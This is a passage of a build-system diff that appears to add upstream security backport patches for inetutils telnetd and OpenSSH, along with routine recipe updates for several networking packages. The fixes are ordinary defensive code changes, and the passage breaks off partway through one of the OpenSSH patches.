+Date: Mon, 26 Sep 2022 22:05:07 +0200
+Subject: [PATCH] telnetd: Handle early IAC EC or IAC EL receipt
+
+Fix telnetd crash if the first two bytes of a new connection
+are 0xff 0xf7 (IAC EC) or 0xff 0xf8 (IAC EL).
+
+The problem was reported in:
+<https://pierrekim.github.io/blog/2022-08-24-2-byte-dos-freebsd-netbsd-telnetd-netkit-telnetd-inetutils-telnetd-kerberos-telnetd.html>.
+
+* NEWS: Mention fix.
+* telnetd/state.c (telrcv): Handle zero slctab[SLC_EC].sptr and
+zero slctab[SLC_EL].sptr.
+
+CVE: CVE-2022-39028
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fae8263e467380483c28513c0e5fac143e46f94f]
+Signed-off-by: Minjae Kim<flowergom@gmail.com>
+---
+ telnetd/state.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/telnetd/state.c b/telnetd/state.c
+index 2184bca..7948503 100644
+--- a/telnetd/state.c
++++ b/telnetd/state.c
+@@ -314,15 +314,21 @@ telrcv (void)
+ case EC:
+ case EL:
+ {
+- cc_t ch;
++ cc_t ch = (cc_t) (_POSIX_VDISABLE);
+
+ DEBUG (debug_options, 1, printoption ("td: recv IAC", c));
+ ptyflush (); /* half-hearted */
+ init_termbuf ();
+ if (c == EC)
+- ch = *slctab[SLC_EC].sptr;
++ {
++ if (slctab[SLC_EC].sptr)
++ ch = *slctab[SLC_EC].sptr;
++ }
+ else
+- ch = *slctab[SLC_EL].sptr;
++ {
++ if (slctab[SLC_EL].sptr)
++ ch = *slctab[SLC_EL].sptr;
++ }
+ if (ch != (cc_t) (_POSIX_VDISABLE))
+ pty_output_byte ((unsigned char) ch);
+ break;
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
index cc9410b94e..3a68b34825 100644
--- a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
@@ -23,6 +23,10 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \
file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
file://0001-rcp-fix-to-work-with-large-files.patch \
file://fix-buffer-fortify-tfpt.patch \
+ file://CVE-2021-40491.patch \
+ file://CVE-2022-39028.patch \
+ file://0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch \
+ file://0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch \
"
SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52"
diff --git a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
index 5e4460045b..5213b28345 100644
--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution"
HOMEPAGE = "https://github.com/lathiat/nss-mdns"
+DESCRIPTION = "nss-mdns is a plugin for the GNU Name Service Switch (NSS) functionality of the GNU C Library (glibc) providing host name resolution via Multicast DNS (aka Zeroconf, aka Apple Rendezvous, aka Apple Bonjour), effectively allowing name resolution by common Unix/Linux programs in the ad-hoc mDNS domain .local."
SECTION = "libs"
LICENSE = "LGPLv2.1+"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
DEPENDS = "avahi"
-SRC_URI = "git://github.com/lathiat/nss-mdns \
+SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
"
SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"
diff --git a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
index 0b0bbab168..a4030b7b32 100644
--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -1,13 +1,15 @@
SUMMARY = "Mobile Broadband Service Provider Database"
HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders"
+DESCRIPTION = "Mobile Broadband Service Provider Database stores service provider specific information. When this Database is available the information can be fetched there"
SECTION = "network"
LICENSE = "PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04"
-SRCREV = "22b49d86fb7aded2c195a9d49e5924da696b3228"
-PV = "20190618"
+
+SRCREV = "aae7c68671d225e6d35224613d5b98192b9b2ffe"
+PV = "20230416"
PE = "1"
-SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=main"
S = "${WORKDIR}/git"
inherit autotools
diff --git a/meta/recipes-connectivity/neard/neard_0.16.bb b/meta/recipes-connectivity/neard/neard_0.16.bb
index 7c124a3c0b..dd0742f792 100644
--- a/meta/recipes-connectivity/neard/neard_0.16.bb
+++ b/meta/recipes-connectivity/neard/neard_0.16.bb
@@ -2,21 +2,22 @@ SUMMARY = "Linux NFC daemon"
DESCRIPTION = "A daemon for the Linux Near Field Communication stack"
HOMEPAGE = "http://01.org/linux-nfc"
LICENSE = "GPLv2"
+LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
+ file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
+ "
DEPENDS = "dbus glib-2.0 libnl"
-SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BP}.tar.xz \
+SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=git;branch=master \
file://neard.in \
file://Makefile.am-fix-parallel-issue.patch \
file://Makefile.am-do-not-ship-version.h.patch \
file://0001-Add-header-dependency-to-nciattach.o.patch \
"
-SRC_URI[md5sum] = "5c691fb7872856dc0d909c298bc8cb41"
-SRC_URI[sha256sum] = "eae3b11c541a988ec11ca94b7deab01080cd5b58cfef3ced6ceac9b6e6e65b36"
-LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
- file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
- "
+SRCREV = "949795024f7625420e93e288c56e194cb9a3e74a"
+
+S = "${WORKDIR}/git"
inherit autotools pkgconfig systemd update-rc.d
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
new file mode 100644
index 0000000000..3adb981fb4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
@@ -0,0 +1,97 @@
+From b3855ff053f5078ec3d3c653cdaedefaa5fc362d Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 05:23:03 +0000
+Subject: upstream: tweak the client hostkey preference ordering algorithm to
+
+prefer the default ordering if the user has a key that matches the
+best-preference default algorithm.
+
+feedback and ok markus@
+
+OpenBSD-Commit-ID: a92dd7d7520ddd95c0a16786a7519e6d0167d35f
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ sshconnect2.c | 41 ++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 38 insertions(+), 3 deletions(-)
+
+CVE: CVE-2020-14145
+Upstream-Status: Backport [https://anongit.mindrot.org/openssh.git/patch/?id=b3855ff053f5078ec3d3c653cdaedefaa5fc362d]
+Comment: Refreshed first hunk
+
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 347e348c..f64aae66 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: sshconnect2.c,v 1.320 2020/02/06 22:48:23 djm Exp $ */
++/* $OpenBSD: sshconnect2.c,v 1.326 2020/09/18 05:23:03 djm Exp $ */
+ /*
+ * Copyright (c) 2000 Markus Friedl. All rights reserved.
+ * Copyright (c) 2008 Damien Miller. All rights reserved.
+@@ -102,12 +102,25 @@ verify_host_key_callback(struct sshkey *hostkey, struct ssh *ssh)
+ return 0;
+ }
+
++/* Returns the first item from a comma-separated algorithm list */
++static char *
++first_alg(const char *algs)
++{
++ char *ret, *cp;
++
++ ret = xstrdup(algs);
++ if ((cp = strchr(ret, ',')) != NULL)
++ *cp = '\0';
++ return ret;
++}
++
+ static char *
+ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ {
+- char *oavail, *avail, *first, *last, *alg, *hostname, *ret;
++ char *oavail = NULL, *avail = NULL, *first = NULL, *last = NULL;
++ char *alg = NULL, *hostname = NULL, *ret = NULL, *best = NULL;
+ size_t maxlen;
+- struct hostkeys *hostkeys;
++ struct hostkeys *hostkeys = NULL;
+ int ktype;
+ u_int i;
+
+@@ -119,6 +132,26 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ for (i = 0; i < options.num_system_hostfiles; i++)
+ load_hostkeys(hostkeys, hostname, options.system_hostfiles[i]);
+
++ /*
++ * If a plain public key exists that matches the type of the best
++ * preference HostkeyAlgorithms, then use the whole list as is.
++ * Note that we ignore whether the best preference algorithm is a
++ * certificate type, as sshconnect.c will downgrade certs to
++ * plain keys if necessary.
++ */
++ best = first_alg(options.hostkeyalgorithms);
++ if (lookup_key_in_hostkeys_by_type(hostkeys,
++ sshkey_type_plain(sshkey_type_from_name(best)), NULL)) {
++ debug3("%s: have matching best-preference key type %s, "
++ "using HostkeyAlgorithms verbatim", __func__, best);
++ ret = xstrdup(options.hostkeyalgorithms);
++ goto out;
++ }
++
++ /*
++ * Otherwise, prefer the host key algorithms that match known keys
++ * while keeping the ordering of HostkeyAlgorithms as much as possible.
++ */
+ oavail = avail = xstrdup(options.hostkeyalgorithms);
+ maxlen = strlen(avail) + 1;
+ first = xmalloc(maxlen);
+@@ -159,6 +192,8 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ if (*first != '\0')
+ debug3("%s: prefer hostkeyalgs: %s", __func__, first);
+
++ out:
++ free(best);
+ free(first);
+ free(last);
+ free(hostname);
+--
+cgit v1.2.3
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
new file mode 100644
index 0000000000..9fd7e932d1
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
@@ -0,0 +1,20 @@
+Description: fix double-free memory corruption in ssh-agent
+Author: Marc Deslauriers <marc.deslauriers@canonical.com>
+Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+CVE: CVE-2021-28041
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz]
+Comment: No change in any hunk
+
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e)
+ goto err;
+ }
+ free(ext_name);
++ ext_name = NULL;
+ break;
+ default:
+ error("%s: Unknown constraint %d", __func__, ctype);
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
new file mode 100644
index 0000000000..bda896f581
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,52 @@
+From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001
+From: Ali Abdallah <aabdallah@suse.de>
+Date: Wed, 24 Nov 2021 13:33:39 +0100
+Subject: [PATCH] CVE-2021-41617 fix
+
+backport of the following two upstream commits
+
+f3cbe43e28fe71427d41cfe3a17125b972710455
+bf944e3794eff5413f2df1ef37cddf96918c6bde
+
+CVE-2021-41617 failed to correctly initialise supplemental groups
+when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand,
+where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser
+directive has been set to run the command as a different user. Instead
+these commands would inherit the groups that sshd(8) was started with.
+---
+ auth.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+CVE: CVE-2021-41617
+Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/auth.c b/auth.c
+index 163038f..a47b267 100644
+--- a/auth.c
++++ b/auth.c
+@@ -52,6 +52,7 @@
+ #include <limits.h>
+ #include <netdb.h>
+ #include <time.h>
++#include <grp.h>
+
+ #include "xmalloc.h"
+ #include "match.h"
+@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command,
+ }
+ closefrom(STDERR_FILENO + 1);
+
++ if (geteuid() == 0 &&
++ initgroups(pw->pw_name, pw->pw_gid) == -1) {
++ error("%s: initgroups(%s, %u): %s", tag,
++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
++ _exit(1);
++ }
++
+ /* Don't use permanently_set_uid() here to avoid fatal() */
+ if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
+ error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
+--
+2.26.2
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
new file mode 100644
index 0000000000..c899056337
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
@@ -0,0 +1,189 @@
+From f6213e03887237714eb5bcfc9089c707069f87c5 Mon Sep 17 00:00:00 2001
+From: Damien Miller <djm@mindrot.org>
+Date: Fri, 1 Oct 2021 16:35:49 +1000
+Subject: [PATCH 01/12] make OPENSSL_HAS_ECC checks more thorough
+
+ok dtucker
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/dee22129bbc61e25b1003adfa2bc584c5406ef2d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 16 ++++++++--------
+ ssh-pkcs11.c | 26 +++++++++++++-------------
+ 2 files changed, 21 insertions(+), 21 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 8a0ffef..41114c7 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -163,7 +163,7 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ return (ret);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ const BIGNUM *rp, EC_KEY *ec)
+@@ -220,12 +220,12 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ sshbuf_free(msg);
+ return (ret);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static RSA_METHOD *helper_rsa;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *helper_ecdsa;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+@@ -233,10 +233,10 @@ wrap_key(struct sshkey *k)
+ {
+ if (k->type == KEY_RSA)
+ RSA_set_method(k->rsa, helper_rsa);
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ else if (k->type == KEY_ECDSA)
+ EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ else
+ fatal("%s: unknown key type", __func__);
+ }
+@@ -247,7 +247,7 @@ pkcs11_start_helper_methods(void)
+ if (helper_rsa != NULL)
+ return (0);
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
+ unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+ if (helper_ecdsa != NULL)
+@@ -257,7 +257,7 @@ pkcs11_start_helper_methods(void)
+ return (-1);
+ EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+ EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
+ fatal("%s: RSA_meth_dup failed", __func__);
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index a302c79..b56a41b 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -78,7 +78,7 @@ struct pkcs11_key {
+
+ int pkcs11_interactive = 0;
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static void
+ ossl_error(const char *msg)
+ {
+@@ -89,7 +89,7 @@ ossl_error(const char *msg)
+ error("%s: libcrypto error: %.100s", __func__,
+ ERR_error_string(e, NULL));
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ int
+ pkcs11_init(int interactive)
+@@ -190,10 +190,10 @@ pkcs11_del_provider(char *provider_id)
+
+ static RSA_METHOD *rsa_method;
+ static int rsa_idx = 0;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *ec_key_method;
+ static int ec_key_idx = 0;
+-#endif
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* release a wrapped object */
+ static void
+@@ -492,7 +492,7 @@ pkcs11_rsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+ return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ /* openssl callback doing the actual signing operation */
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+@@ -604,7 +604,7 @@ pkcs11_ecdsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+
+ return (0);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* remove trailing spaces */
+ static void
+@@ -679,7 +679,7 @@ pkcs11_key_included(struct sshkey ***keysp, int *nkeys, struct sshkey *key)
+ return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static struct sshkey *
+ pkcs11_fetch_ecdsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ CK_OBJECT_HANDLE *obj)
+@@ -802,7 +802,7 @@ fail:
+
+ return (key);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static struct sshkey *
+ pkcs11_fetch_rsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+@@ -910,7 +910,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ #endif
+ struct sshkey *key = NULL;
+ int i;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ int nid;
+ #endif
+ const u_char *cp;
+@@ -999,7 +999,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ key->type = KEY_RSA;
+ key->flags |= SSHKEY_FLAG_EXT;
+ rsa = NULL; /* now owned by key */
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ } else if (EVP_PKEY_base_id(evp) == EVP_PKEY_EC) {
+ if (EVP_PKEY_get0_EC_KEY(evp) == NULL) {
+ error("invalid x509; no ec key");
+@@ -1030,7 +1030,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ key->type = KEY_ECDSA;
+ key->flags |= SSHKEY_FLAG_EXT;
+ ec = NULL; /* now owned by key */
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ } else {
+ error("unknown certificate key type");
+ goto out;
+@@ -1237,11 +1237,11 @@ pkcs11_fetch_keys(struct pkcs11_provider *p, CK_ULONG slotidx,
+ case CKK_RSA:
+ key = pkcs11_fetch_rsa_pubkey(p, slotidx, &obj);
+ break;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ case CKK_ECDSA:
+ key = pkcs11_fetch_ecdsa_pubkey(p, slotidx, &obj);
+ break;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ default:
+ /* XXX print key type? */
+ key = NULL;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
new file mode 100644
index 0000000000..25ba921869
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
@@ -0,0 +1,581 @@
+From 92cebfbcc221c9ef3f6bbb78da3d7699c0ae56be Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:03:45 +0000
+Subject: [PATCH 02/12] upstream: Separate ssh-pkcs11-helpers for each p11
+ module
+
+Make ssh-pkcs11-client start an independent helper for each provider,
+providing better isolation between modules and reliability if a single
+module misbehaves.
+
+This also implements reference counting of PKCS#11-hosted keys,
+allowing ssh-pkcs11-helper subprocesses to be automatically reaped
+when no remaining keys reference them. This fixes some bugs we have
+that make PKCS11 keys unusable after they have been deleted, e.g.
+https://bugzilla.mindrot.org/show_bug.cgi?id=3125
+
+ok markus@
+
+OpenBSD-Commit-ID: 0ce188b14fe271ab0568f4500070d96c5657244e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/099cdf59ce1e72f55d421c8445bf6321b3004755]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 372 +++++++++++++++++++++++++++++++++-----------
+ 1 file changed, 282 insertions(+), 90 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 41114c7..4f3c6ed 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-pkcs11-client.c,v 1.16 2020/01/25 00:03:36 djm Exp $ */
++/* $OpenBSD: ssh-pkcs11-client.c,v 1.18 2023/07/19 14:03:45 djm Exp $ */
+ /*
+ * Copyright (c) 2010 Markus Friedl. All rights reserved.
+ * Copyright (c) 2014 Pedro Martelletto. All rights reserved.
+@@ -30,12 +30,11 @@
+ #include <string.h>
+ #include <unistd.h>
+ #include <errno.h>
++#include <limits.h>
+
+ #include <openssl/ecdsa.h>
+ #include <openssl/rsa.h>
+
+-#include "openbsd-compat/openssl-compat.h"
+-
+ #include "pathnames.h"
+ #include "xmalloc.h"
+ #include "sshbuf.h"
+@@ -47,18 +46,140 @@
+ #include "ssh-pkcs11.h"
+ #include "ssherr.h"
+
++#include "openbsd-compat/openssl-compat.h"
++
+ /* borrows code from sftp-server and ssh-agent */
+
+-static int fd = -1;
+-static pid_t pid = -1;
++/*
++ * Maintain a list of ssh-pkcs11-helper subprocesses. These may be looked up
++ * by provider path or their unique EC/RSA METHOD pointers.
++ */
++struct helper {
++ char *path;
++ pid_t pid;
++ int fd;
++ RSA_METHOD *rsa_meth;
++ EC_KEY_METHOD *ec_meth;
++ int (*rsa_finish)(RSA *rsa);
++ void (*ec_finish)(EC_KEY *key);
++ size_t nrsa, nec; /* number of active keys of each type */
++};
++static struct helper **helpers;
++static size_t nhelpers;
++
++static struct helper *
++helper_by_provider(const char *path)
++{
++ size_t i;
++
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] == NULL || helpers[i]->path == NULL ||
++ helpers[i]->fd == -1)
++ continue;
++ if (strcmp(helpers[i]->path, path) == 0)
++ return helpers[i];
++ }
++ return NULL;
++}
++
++static struct helper *
++helper_by_rsa(const RSA *rsa)
++{
++ size_t i;
++ const RSA_METHOD *meth;
++
++ if ((meth = RSA_get_method(rsa)) == NULL)
++ return NULL;
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] != NULL && helpers[i]->rsa_meth == meth)
++ return helpers[i];
++ }
++ return NULL;
++
++}
++
++static struct helper *
++helper_by_ec(const EC_KEY *ec)
++{
++ size_t i;
++ const EC_KEY_METHOD *meth;
++
++ if ((meth = EC_KEY_get_method(ec)) == NULL)
++ return NULL;
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] != NULL && helpers[i]->ec_meth == meth)
++ return helpers[i];
++ }
++ return NULL;
++
++}
++
++static void
++helper_free(struct helper *helper)
++{
++ size_t i;
++ int found = 0;
++
++ if (helper == NULL)
++ return;
++ if (helper->path == NULL || helper->ec_meth == NULL ||
++ helper->rsa_meth == NULL)
++ fatal("%s: inconsistent helper", __func__);
++ debug3("%s: free helper for provider %s", __func__ , helper->path);
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] == helper) {
++ if (found)
++ fatal("%s: helper recorded more than once", __func__);
++ found = 1;
++ }
++ else if (found)
++ helpers[i - 1] = helpers[i];
++ }
++ if (found) {
++ helpers = xrecallocarray(helpers, nhelpers,
++ nhelpers - 1, sizeof(*helpers));
++ nhelpers--;
++ }
++ free(helper->path);
++ EC_KEY_METHOD_free(helper->ec_meth);
++ RSA_meth_free(helper->rsa_meth);
++ free(helper);
++}
++
++static void
++helper_terminate(struct helper *helper)
++{
++ if (helper == NULL) {
++ return;
++ } else if (helper->fd == -1) {
++ debug3("%s: already terminated", __func__);
++ } else {
++ debug3("terminating helper for %s; "
++ "remaining %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ close(helper->fd);
++ /* XXX waitpid() */
++ helper->fd = -1;
++ helper->pid = -1;
++ }
++ /*
++ * Don't delete the helper entry until there are no remaining keys
++ * that reference it. Otherwise, any signing operation would call
++ * a free'd METHOD pointer and that would be bad.
++ */
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_free(helper);
++}
+
+ static void
+-send_msg(struct sshbuf *m)
++send_msg(int fd, struct sshbuf *m)
+ {
+ u_char buf[4];
+ size_t mlen = sshbuf_len(m);
+ int r;
+
++ if (fd == -1)
++ return;
+ POKE_U32(buf, mlen);
+ if (atomicio(vwrite, fd, buf, 4) != 4 ||
+ atomicio(vwrite, fd, sshbuf_mutable_ptr(m),
+@@ -69,12 +190,15 @@ send_msg(struct sshbuf *m)
+ }
+
+ static int
+-recv_msg(struct sshbuf *m)
++recv_msg(int fd, struct sshbuf *m)
+ {
+ u_int l, len;
+ u_char c, buf[1024];
+ int r;
+
++ sshbuf_reset(m);
++ if (fd == -1)
++ return 0; /* XXX */
+ if ((len = atomicio(read, fd, buf, 4)) != 4) {
+ error("read from helper failed: %u", len);
+ return (0); /* XXX */
+@@ -83,7 +207,6 @@ recv_msg(struct sshbuf *m)
+ if (len > 256 * 1024)
+ fatal("response too long: %u", len);
+ /* read len bytes into m */
+- sshbuf_reset(m);
+ while (len > 0) {
+ l = len;
+ if (l > sizeof(buf))
+@@ -104,14 +227,17 @@ recv_msg(struct sshbuf *m)
+ int
+ pkcs11_init(int interactive)
+ {
+- return (0);
++ return 0;
+ }
+
+ void
+ pkcs11_terminate(void)
+ {
+- if (fd >= 0)
+- close(fd);
++ size_t i;
++
++ debug3("%s: terminating %zu helpers", __func__, nhelpers);
++ for (i = 0; i < nhelpers; i++)
++ helper_terminate(helpers[i]);
+ }
+
+ static int
